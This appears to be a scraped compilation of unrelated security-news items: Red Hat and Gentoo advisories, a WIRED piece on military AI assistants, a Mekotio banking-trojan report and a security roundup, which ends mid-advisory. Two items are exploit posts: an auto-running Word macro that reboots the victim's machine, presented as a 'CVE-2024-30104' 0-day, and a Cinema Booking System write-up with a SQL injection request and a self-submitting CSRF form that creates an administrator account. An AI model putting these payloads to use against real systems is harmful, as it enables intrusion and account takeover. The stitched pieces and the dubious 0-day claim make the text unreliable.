Microsoft Office 365 appears susceptible to macro code execution that can result in remote code execution.

    ### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)The problem is still in the "docx" files this vulnerability is a 0 daybased on the Follina exploit. The Microsoft company still doesn't wantto understand, that they MUST remove macros options from the 365Office and their offline app. In this video, you will see an exampleof this, how some users can be trickery to open the malicious filethat is sent to them by the attacker. After execution of the file, thething will be very bad for the users who execute it on their computer.It depends of the scenario.### The exploit:```vbsSub AutoOpen()Dim Program As StringDim TaskID As DoubleOn Error Resume NextProgram = "shutdown /R"TaskID = Shell(Program, 1)If Err <> 0 ThenMsgBox "Can't start " & ProgramEnd IfEnd Sub```- Enjoy watching### PoC:[video](https://www.patreon.com/posts/cve-2024-30104-107163015)

Microsoft Office 265 Remote Code Execution

Red Hat Security Advisory 2024-4352-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include double free, memory leak, null pointer, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4352.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:4352-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4352  
Issue date:         2024-07-08  
Revision:           03  
CVE Names:          CVE-2020-26555  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

[Updated 03 July 2024]

The text of this advisory has been updated with the correct product name (Red  
Hat Enterprise Linux 8) in the Topics section. In the Problem Description  
section, CVEs of the same sub-components have been grouped together. The  
packages included in this revised update have not been changed in any way from  
the packages included in the original advisory.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: tls (CVE-2024-26585,CVE-2024-26584, CVE-2024-26583

* kernel-rt: kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)

* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)

* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng (CVE-2023-52615)

* kernel-rt: kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)

* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset CVE-2024-26801)

* kernel: Squashfs: check the inode number is not the invalid value of zero  (CVE-2024-26982)

* kernel: netfilter: nf_tables: use timestamp to check for set element timeout (CVE-2024-27397)

* kernel: wifi: mac80211: (CVE-2024-35789, CVE-2024-35838, CVE-2024-35845)

* kernel: wifi: nl80211: reject iftype change with mesh ID change (CVE-2024-27410)

* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)

* kernel:TCP-spoofed ghost ACKs and leak initial sequence number (CVE-2023-52881)

* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)

* kernel: ovl: fix leaked dentry (CVE-2021-46972)

* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)

* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)

* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)

* kernel: mm/swap: fix race when skipping swapcache (CVE-2024-26759)

* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)

* kernel: x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault() (CVE-2024-26906)

* kernel: net: ip_tunnel: prevent perpetual headroom growth (CVE-2024-26804)

* kernel: net/usb: kalmia: avoid printing uninitialized value on error path (CVE-2023-52703)

* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)

* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)

* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)

* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)

* kernel: net/bnx2x: Prevent access to a freed page in page_pool (CVE-2024-26859)

* kernel: crypto: (CVE-2024-26974, CVE-2023-52813)

* kernel: can: (CVE-2023-52878, CVE-2021-47456)

* kernel: usb: (CVE-2023-52781, CVE-2023-52877)

* kernel: net/mlx5e: fix a potential double-free in fs_any_create_groups (CVE-2023-52667)

* kernel: usbnet: sanity check for maxpacket (CVE-2021-47495)

* kernel: gro: fix ownership transfer (CVE-2024-35890)

* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)

* kernel: tipc: fix kernel warning when sending SYN message (CVE-2023-52700)

* kernel: net/mlx5/mlxsw: (CVE-2024-35960, CVE-2024-36007, CVE-2024-35855)

* kernel: net/mlx5e: (CVE-2024-35959, CVE-2023-52626, CVE-2024-35835)

* kernel: mlxsw: (CVE-2024-35854, CVE-2024-35853, CVE-2024-35852)

* kernel: net: (CVE-2024-35958, CVE-2021-47311, CVE-2021-47236, CVE-2021-47310)

* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)

* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)

* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-40882)

* [rhel8.9][cxgb4]BUG: using smp_processor_id() in preemptible [00000000] code: ethtool/54735 (JIRA:RHEL-8779)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-26555

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1918601  
https://bugzilla.redhat.com/show_bug.cgi?id=2248122  
https://bugzilla.redhat.com/show_bug.cgi?id=2258875  
https://bugzilla.redhat.com/show_bug.cgi?id=2265517  
https://bugzilla.redhat.com/show_bug.cgi?id=2265519  
https://bugzilla.redhat.com/show_bug.cgi?id=2265520  
https://bugzilla.redhat.com/show_bug.cgi?id=2265800  
https://bugzilla.redhat.com/show_bug.cgi?id=2266408  
https://bugzilla.redhat.com/show_bug.cgi?id=2266831  
https://bugzilla.redhat.com/show_bug.cgi?id=2267513  
https://bugzilla.redhat.com/show_bug.cgi?id=2267518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267730  
https://bugzilla.redhat.com/show_bug.cgi?id=2270093  
https://bugzilla.redhat.com/show_bug.cgi?id=2271680  
https://bugzilla.redhat.com/show_bug.cgi?id=2272692  
https://bugzilla.redhat.com/show_bug.cgi?id=2272829  
https://bugzilla.redhat.com/show_bug.cgi?id=2273204  
https://bugzilla.redhat.com/show_bug.cgi?id=2273278  
https://bugzilla.redhat.com/show_bug.cgi?id=2273423  
https://bugzilla.redhat.com/show_bug.cgi?id=2273429  
https://bugzilla.redhat.com/show_bug.cgi?id=2275604  
https://bugzilla.redhat.com/show_bug.cgi?id=2275633  
https://bugzilla.redhat.com/show_bug.cgi?id=2275635  
https://bugzilla.redhat.com/show_bug.cgi?id=2275733  
https://bugzilla.redhat.com/show_bug.cgi?id=2278337  
https://bugzilla.redhat.com/show_bug.cgi?id=2278354  
https://bugzilla.redhat.com/show_bug.cgi?id=2280434  
https://bugzilla.redhat.com/show_bug.cgi?id=2281057  
https://bugzilla.redhat.com/show_bug.cgi?id=2281113  
https://bugzilla.redhat.com/show_bug.cgi?id=2281157  
https://bugzilla.redhat.com/show_bug.cgi?id=2281165  
https://bugzilla.redhat.com/show_bug.cgi?id=2281251  
https://bugzilla.redhat.com/show_bug.cgi?id=2281253  
https://bugzilla.redhat.com/show_bug.cgi?id=2281255  
https://bugzilla.redhat.com/show_bug.cgi?id=2281257  
https://bugzilla.redhat.com/show_bug.cgi?id=2281272  
https://bugzilla.redhat.com/show_bug.cgi?id=2281350  
https://bugzilla.redhat.com/show_bug.cgi?id=2281689  
https://bugzilla.redhat.com/show_bug.cgi?id=2281693  
https://bugzilla.redhat.com/show_bug.cgi?id=2281920  
https://bugzilla.redhat.com/show_bug.cgi?id=2281923  
https://bugzilla.redhat.com/show_bug.cgi?id=2281925  
https://bugzilla.redhat.com/show_bug.cgi?id=2281953  
https://bugzilla.redhat.com/show_bug.cgi?id=2281986  
https://bugzilla.redhat.com/show_bug.cgi?id=2282394  
https://bugzilla.redhat.com/show_bug.cgi?id=2282400  
https://bugzilla.redhat.com/show_bug.cgi?id=2282471  
https://bugzilla.redhat.com/show_bug.cgi?id=2282472  
https://bugzilla.redhat.com/show_bug.cgi?id=2282581  
https://bugzilla.redhat.com/show_bug.cgi?id=2282609  
https://bugzilla.redhat.com/show_bug.cgi?id=2282612  
https://bugzilla.redhat.com/show_bug.cgi?id=2282653  
https://bugzilla.redhat.com/show_bug.cgi?id=2282680  
https://bugzilla.redhat.com/show_bug.cgi?id=2282698  
https://bugzilla.redhat.com/show_bug.cgi?id=2282712  
https://bugzilla.redhat.com/show_bug.cgi?id=2282735  
https://bugzilla.redhat.com/show_bug.cgi?id=2282902  
https://bugzilla.redhat.com/show_bug.cgi?id=2282920

Red Hat Security Advisory 2024-4352-03

Red Hat Security Advisory 2024-4351-03 - An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4351.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: virt:rhel and virt-devel:rhel security and bug fix update  
Advisory ID:        RHSA-2024:4351-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4351  
Issue date:         2024-07-08  
Revision:           03  
CVE Names:          CVE-2024-4418  
====================================================================

Summary: 

An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Description:

Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.

Security Fix:

* virt:rhel/libvirt: stack use-after-free in virNetClientIOEventLoop (CVE-2024-4418) 

Bug fix:

* virsh destroy with --graceful destroyed a paused guest (qemu process paused by SIGSTOP) (JIRA:RHEL-36064)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-4418

References:

https://access.redhat.com/security/updates/classification/#low  
https://bugzilla.redhat.com/show_bug.cgi?id=2278616  
https://issues.redhat.com/browse/RHEL-36064

Red Hat Security Advisory 2024-4351-03

The US military has abandoned its half-century dream of a suit of powered armor in favor of a “hyper enabled operator,” a tactical AI assistant for special operations forces.

The day is slowly turning into night, and the American special operators are growing concerned. They are deployed to a densely populated urban center in a politically volatile region, and local activity has grown increasingly frenetic in recent days, the roads and markets overflowing with more than the normal bustle of city life. Intelligence suggests the threat level in the city is high, but the specifics are vague, and the team needs to maintain a low profile—a firefight could bring known hostile elements down upon them. To assess potential threats, the Americans decide to take a more cautious approach. Eschewing conspicuous tactical gear in favor of blending in with potential crowds, an operator steps out into the neighborhood's main thoroughfare to see what he can see.

With a click of a button, the operator sees … everything. A complex suite of sensors affixed to his head-up display start vacuuming up information from the world around him. Body language, heart rates, facial expressions, and even ambient snatches of conversation in local dialects are rapidly collected and routed through his backpack supercomputers for processing with the help of an onboard artificial intelligence engine. The information is instantly analyzed, streamlined, and regurgitated back into the head-up display. The assessment from the operators’ tactical AI sidekick comes back clear: There are a series of seasonal events coming into town, and most passersby are excited and exuberant, presenting a minimal threat to the team. Crisis averted—for now.

This is one of many potential scenarios repeatedly presented by Defense Department officials in recent years when discussing the future of US special operations forces, those elite troops tasked with facing the world’s most complex threats head-on as the “tip of the spear” of the US military. Both defense officials and science-fiction scribes may have envisioned a future of warfare shaped by brain implants and performing enhancing drugs, or a suit of powered armor straight out of _Starship Troopers_, but according to US Special Operations Command, the next generation of armed conflict will be fought (and, hopefully, won) with a relatively simple concept: the “hyper enabled operator.”

**More Brains, Less Brawn**

First introduced to the public in 2019 in an essay by officials from SOCOM’s Joint Acquisition Task Force (JATF) for Small Wars Journal, the hyper-enabled operator (HEO) concept is the successor program to the Tactical Assault Light Operator Suit (TALOS) effort that, initiated in 2013, sought to outfit US special operations forces with a so-called “Iron Man” suit. Inspired by the 2012 death of a Navy SEAL during a hostage rescue operation in Afghanistan, TALOS was intended to improve operators’ survivability in combat by making them virtually resistant to small-arms fire through additional layers of sophisticated armor, the latest installment of the Pentagon’s decades-long effort to build a powered exoskeleton for infantry troops. While the TALOS effort was declared dead in 2019 due to challenges integrating its disparate systems into one cohesive unit, the lessons learned from the program gave rise to the HEO as a natural successor.

The core objective of the HEO concept is straightforward: to give warfighters “cognitive overmatch” on the battlefield, or “the ability to dominate the situation by making informed decisions faster than the opponent,” as SOCOM officials put it. Rather than bestowing US special operations forces with physical advantages through next-generation body armor and exotic weaponry, the future operator will head into battle with technologies designed to boost their situational awareness and relevant decisionmaking to superior levels compared to the adversary. Former fighter pilot and Air Force colonel John Boyd proposed the “OODA loop” (observe, orient, decide, act) as the core military decisionmaking model of the 21st century; the HEO concept seeks to use technology to “tighten” that loop so far that operators are quite literally making smarter and faster decisions than the enemy.

“The goal of HEO,” as SOCOM officials put it in 2019, “is to get the right information to the right person at the right time.”

To achieve this goal, the HEO concept calls for swapping the powered armor at the heart of the TALOS effort for sophisticated communications equipment and a robust sensor suite built on advanced computing architecture, allowing the operator to vacuum up relevant data and distill it into actionable information through a simple interface like a head-up display—and do so “at the edge,” in places where traditional communications networks may not be available. If TALOS was envisioned as an “Iron Man'' suit, as I previously observed, then HEO is essentially Jarvis, Tony Stark’s built-in AI assistant that’s constantly feeding him information through his helmet’s head-up display.

“\[JATF\] is targeting technologies to deliver cognitive overmatch to SOF operators working at the edge in austere and contested environments in coordination with and working through partners and allies,” SOCOM spokesperson James O. Gregory tells WIRED, invoking a general description of the program from the command’s website. “Such technologies will enable tactical teams of SOF operators to intuitively use information made available by next-generation sensors, networks, computing, and communication systems to rapidly build situation awareness. It will also help make timely, well-informed decisions, and take actions inside an adversary's ability to react.”

**Enter the Gray Zone**

So what does the HEO actually look like today, five years after its introduction into the US military’s tactical lexicon? Given the sensitive (and somewhat notional) nature of the effort, details remain scarce, and SOCOM officials have remained relatively tight-lipped about its progress. But according to SOCOM’s Gregory, the scenario and concept the HEO seeks to address has “evolved” from what officials previously described to reporters at the program’s inception. Indeed, rather than augmenting warfighters deployed to active combat zones, SOCOM officials envision something more like a casually dressed operator vacuuming up information on a busy urban avenue through a Google Glass-like eyepiece and sizing up the situation—in other words, more James Bond than Tony Stark.

“The operational environment for the JATF’s current efforts is in the competition phase of warfare, in permissive or semi-permissive locations,” Gregory says. (A permissive environment is generally defined as an operational environment where US forces have the backing of a host country’s security apparatus, according to the US Army, while a “semi-permissive” environment is potentially hostile and local support is often not reliable.) No longer just another tool for a kinetic assault, the HEO will help elite troops operating in the “gray zone” between peace and conflict.

A SOCOM broad agency announcement—a general request for research and development proposals from the defense industry—published in 2020 and updated as recently as November 2023 details the JATF’s push for advanced technologies designed to boost situational awareness. Those technologies include: intelligence, surveillance, and reconnaissance capabilities “without substantial manning or networking resources” (the aforementioned “at the edge”); sophisticated sensors capable of “iris, facial, anatomical measures, gestures, gait, heartbeat, electromagnetic signals, deoxyribonucleic acid \[DNA\], and microbiome recognition”; low-visibility communications systems; and “data visualizations” that “permit \[operators\] to receive and intuitively understand networked information from communication, computing, and sensor systems,” among others. In short, the HEO envisions systems that enable the constant, real-time collection and distillation of data into actionable intel that could potentially mean the difference between life and death in an uncertain situation.

**Edge Case**

Envisioning a suite of aspirational capabilities is one thing; actually building them is another thing entirely. In terms of developing new products, Gregory says that the HEO effort has remained focused on three major experimental technology areas for the last several years: sensing and edge computing, architecture and analysis, and language translation.

“Sensing and edge computing” generally refers to the collection and processing of data from a variety of sources, but it also refers to the specialized computing power that operators need not only to function “at the edge,” but to actually run the AI-enabled software that will form the foundation of the HEO.

“Emerging technologies and solutions in artificial intelligence/machine learning require specialized ‘compute’ hardware, as traditional CPU-based devices are insufficient,” Gregory says. “We aim to feature a manpack device with a graphics processing unit, neural processing engine, and/or tensor processing unit capabilities. This will provide the necessary platform to leverage advanced technologies like language translation and other solutions at the edge, even when disconnected from the cloud.”

That computing power forms the basis for the “architecture and analysis” element focused on the rapid assessment and presentation of data to operators in the field. Gregory tells WIRED that, to support this element, the command has developed “a flexible \[system\] architecture that fuses data from various sources and media types” into an easily digestible format for operators to assess and act upon.

As for language translation, that’s self-explanatory. SOCOM believes that “prior to any hostilities ever occurring, clear communication can greatly enhance development of our long-term relationships,” Gregory says. “Voice-to-voice translation enables operators to communicate more effectively than relying on often scarce interpreters in the field. Even though many SOF personnel are multilingual, they are frequently deployed to regions with different languages or dialects.”

In line with these experimental technology areas, SOCOM has reportedly concentrated on six immediate lines of product development, per C4ISRNet: the “operator-worn kit” that includes both sensors and onboard computer processing power; application development resources; a unique, mission-agnostic system architecture; the “human-machine interface” that’s generally envisioned as a digital head-up display; a product called “information realization” that likely involves the clear presentation of data; and beyond-line-of-sight (BLoS) communications designed to keep troops in contact with their commanders (and each other) in satellite-denied environments.

According to Gregory, the command has gradually rolled out a handful of fresh capabilities from the HEO effort in recent years. In 2021, SOCOM announced that two products—a BLoS communications system and an unspecified “integrated situational awareness tool”—were transitioning into official programs of record, as Janes reported at the time. Gregory confirmed to WIRED that the BLoS system consists of “a steerable gimble antenna system that enhances the functionality” of the command’s SOF deployable nodes, a family of advanced satellite communications systems. The spokesperson also confirmed that the situational awareness tool, known as SEEKER, is an app that “enables advisers to build advanced situational awareness, thereby allowing them to select actions with an eye toward the broader situation rather than just the immediately apparent problem.” It’s unclear if the latter is related to the “automate the analyst” effort the command kicked off in 2020 to provide operators with an autonomous AI assistant.

Then there’s the “visual environment translation” system that’s designed to convert foreign language inputs into clear English in real time. Known overarchingly as the Versatile Intelligent Translation Assistant (VITA), the system encompasses both a visual environment translation effort and voice-to-voice translation capabilities and is “the most mature” of the JATF’s experimental technology areas, according to SOCOM. VITA is essentially “a voice-to-voice translation engine that functions offline on GPU-enabled devices,” Gregory says, small enough to be carried in the field on a laptop-tethered smartphone or wearable device and “engage in effective conversations where it was previously impossible.” And not only has VITA successfully demonstrated Russian, Chinese Mandarin, and Ukrainian language translation capabilities during testing, but the system has even been deployed to two undisclosed theaters of operations already.

“The visual translation component enhances situational awareness by translating video images, such as street signs, graffiti, and other written texts, in real time,” Gregory says. “Operators can use their phone cameras to scan their surroundings and understand foreign languages instantly.”

VITA provides US special operations forces with “a high-quality translation capability that is not reliant on the cloud or local interpreters, thus significantly reducing risk and logistical costs while increasing operational range and effectiveness for USSOF and our partners,” Gregory says. “The JATF is currently working with industry partners to reduce the size of the hardware and transition it into a SOF Program Executive Office for eventual fielding.” (And that language translation may not be restricted to a mobile device for long: According to SOCOM’s fiscal year 2025 budget request published in March, the command is still plowing ahead with head-mounted sensors and an augmented-reality HUD to present these functions right before operators’ eyes.)

**Field Work**

To US military planners, the HEO concept is promising: According to one Army assessment, the successful adoption of the system could potentially increase operator survivability far beyond that provided by the additional body armor of the TALOS program. But like other potentially revolutionary technology ventures, there’s certainly the possibility that HEO could end up a science fiction dream that collapses under the weight of its own technical complexity. And there’s no guarantee that operators will embrace the new technology seamlessly in the first place: Although VITA has shown operational promise, it’s unclear if other HEO products will prove intuitive enough to actually augment operators in the field rather than burden them with some complicated newfangled system. As Heinlein put it so aptly in _Starship Troopers_: “If you load a mud foot down with a lot of gadgets that he has to watch, somebody a lot more simply equipped—say with a stone ax—will sneak up and bash his head in while he is trying to read a vernier.”

Perhaps, like TALOS, the promise of a tactical AI assistant like Tony Stark’s Jarvis sidekick may prove simply too ambitious for military engineers to realize in a fully formed product. But even if the HEO effort ends up only fielding, say, the VITA language translation tool, it will still represent a major boost in capabilities for US special operators deployed abroad. The day is slowly turning into night, but American commandos own the night and, with the help of the HEO, will do so well into the next conflict.

AI-Powered Super Soldiers Are More Than Just a Pipe Dream

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).
That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.
Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).

That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.

Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials.

First documented by ESET in August 2020, it's part of a tetrade of banking trojans targeting the region Guildma, Javali, and Grandoreiro, the latter of which was dismantled by law enforcement earlier this year.

"Mekotio shares common characteristics for this type of malware, such as being written in Delphi, using fake pop-up windows, containing backdoor functionality and targeting Spanish- and Portuguese-speaking countries," the Slovakian cybersecurity firm said at the time.

The malware operation suffered a blow in July 2021 when Spanish law enforcement agencies arrested 16 individuals belonging to a criminal network in connection with orchestrating social engineering campaigns targeting European users that delivered Grandoreiro and Mekotio.

Attack chains involve the use of tax-themed phishing emails that aim to trick recipients into opening malicious attachments or clicking on bogus links that lead to the deployment of an MSI installer file, which, in turn, makes use of an AutoHotKey (AHK) script to launch the malware.

It's worth noting that the infection process marks a slight deviation from the one previously detailed by Check Point in November 2021, which made use of an obfuscated batch script that runs a PowerShell script to download a second-stage ZIP file containing the AHK script.

Once installed, Mekotio harvests system information and establishes contact with a command-and-control (C2) server to receive further instructions.

It's main objective is to siphon banking credentials by displaying fake pop-ups that impersonate legitimate banking sites. It can also capture screenshots, log keystrokes, steal clipboard data, and establish persistence on the host using scheduled tasks.

The stolen information can then be used by the threat actors to gain unauthorized access to users' bank accounts and perform fraudulent transactions.

"The Mekotio banking trojan is a persistent and evolving threat to financial systems, especially in Latin American countries," Trend Micro said. "It uses phishing emails to infiltrate systems, with the goal of stealing sensitive information while also maintaining a strong foothold on compromised machines."

The development comes as Mexican cybersecurity firm Scitum disclosed details of a new Latin American banking trojan codenamed Red Mongoose Daemon that, similar to Mekotio, utilizes MSI droppers distributed via phishing emails masquerading as invoices and tax notes.

"The main objective of Red Mongoose Daemon is to steal victims' banking information by spoofing PIX transactions through overlapping windows," the company said. "This trojan is aimed at Brazilian end users and employees of organizations with banking information."

"Red Mongoose Daemon has capabilities for manipulating and creating windows, executing commands, controlling the computer remotely, manipulating web browsers, hijacking clipboards, and impersonating Bitcoin wallets by replacing copied wallets with the ones used by cybercriminals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Warn of Mekotio Banking Trojan Targeting Latin American Countries

Plus: Researchers uncover a new way to expose CSAM peddlers, OpenAI suffered a secret cyberattack, cryptocurrency thefts jump in 2024, and Twilio confirms hackers stole 33 million phone numbers.

Proton, the company behind Proton Mail, launched an end-to-end encrypted alternative to Google Docs, seeking to compete with the cloud giant on privacy. We broke down how Apple is taking a similar approach with its implementation of AI, using a system it calls Private Cloud Compute in its new Apple Intelligence features.

In other news, we dug into how the US bans on TikTok and Kaspersky software, despite their national security justifications, pose a threat to internet freedom. We went inside a crash course for US diplomats on cybersecurity, privacy, surveillance, and other digital threats. And we published an in-depth investigation into the origins of the world’s most popular 3D-printed gun, which revealed that its creator was a self-described “incel” with fantasies of right-wing terror.

But that’s not all. Each week, we round up the security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The giant hack against Ticketmaster may have taken another twist. In June, criminal hackers claimed they had stolen 560 million people’s information from the ticketing company owned by Live Nation. The company has since confirmed a breach, saying its information was taken from its Snowflake account. (More than 165 Snowflake customers were impacted by attacks on the cloud storage company that exploited a lack of multi-factor authentication and stolen login details).

Now in a post on cybercrime marketplace BreachForums, a hacker going by the name of Sp1d3rHunters is threatening to publish more data from Ticketmaster. The account claims to be sharing 170,000 ticket barcodes for upcoming Taylor Swift gigs in the US during October and November. The hacker demanded Ticketmaster “pay us $2million USD” or it will leak “680 million” users’ information and publish millions more event barcodes, including for concerts by artists such as Pink and Sting, and sporting events such as NFL games and F1 races.

The claims appear to be dubious, however, as Ticketmaster's barcodes aren't static, according to the company. “Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied,” a Ticketmaster spokesperson tells WIRED in a statement. The spokesperson adds that the company has not paid any ransom or engaged with the hackers’ demands.

Hacker groups are known to lie, exaggerate, and overinflate their claims as they try to get victims to pay. The 680 million customers that Sp1d3rHunters claimed to have data on is higher than the original figure provided when the Ticketmaster breach was first claimed, and neither number has been confirmed. Even if victims do decide to pay, hackers can still keep the data and try to extort companies for a second time.

Despite the breach at Ticketmaster originally being publicized in June, the company has only recently begun emailing customers alerting them to the incident, which happened between April 2 and May 18 this year. The company says the database accessed may include emails, phone numbers, encrypted credit card information, and other personal information.

**Stolen Login Details Can Unmask Child Abuse Viewers, Researchers Say**

In recent years, there’s been a sharp uptick in cybercriminals deploying infostealers. This malware can grab all of the login and financial details that someone enters on their machine, which hackers then sell to others who want to exploit the information.

Cybersecurity researchers at Recorded Future have now published proof-of-concept findings showing these stolen login details can be used to potentially track down people visiting dark-web child sexual abuse material (CSAM) sites. Within infostealer logs, the researchers say they were able to find thousands of login details for known CSAM websites, which they could then cross-reference with other details and identify the potential real-world names connected to the abusive website logins. The researchers reported details of individuals to law enforcement.

Hackers Leaking Taylor Swift Tickets? Don’t Get Your Hopes Up

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities.:. Google Dorks .:.intitle:Cinema Booking System.:. Date: July 5, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://www.phpjabbers.com/.:. Product -> https://www.phpjabbers.com/cinema-booking-system/.:. Product Version -> 1.0.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| #####################"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."Vulnerability 1: Authenticated SQL InjectionGET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestConnection: keep-aliveReferer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndexCookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952Priority: u=1Response:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESCLIMIT 0, 10' at line 5===========================================================================================Vulnerability 2: Cross Site Request ForgeryRisk:Privilege EscalationProof of concept:<h1>CSRF PoC</h1>    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">        <input type="hidden" name="user_create" value="1">        <input type="hidden" name="role_id" value="1">        <input type="hidden" name="email" value="test@test.com">        <input type="hidden" name="password" value="123123">        <input type="hidden" name="name" value="test">        <input type="hidden" name="phone" value="">        <input type="hidden" name="status" value="T">    </form>    <script type="text/javascript">        document.getElementById('csrfForm').submit();    </script></body></html>

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

Gentoo Linux Security Advisory 202407-17 - Multiple vulnerabilities have been discovered in BusyBox, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.34.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: BusyBox: Multiple Vulnerabilities  
     Date: July 05, 2024  
     Bugs: #824222  
       ID: 202407-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in BusyBox, the worst of  
which could lead to arbitrary code execution.

Background  
==========

BusyBox is set of tools for embedded systems and is a replacement for  
GNU Coreutils.

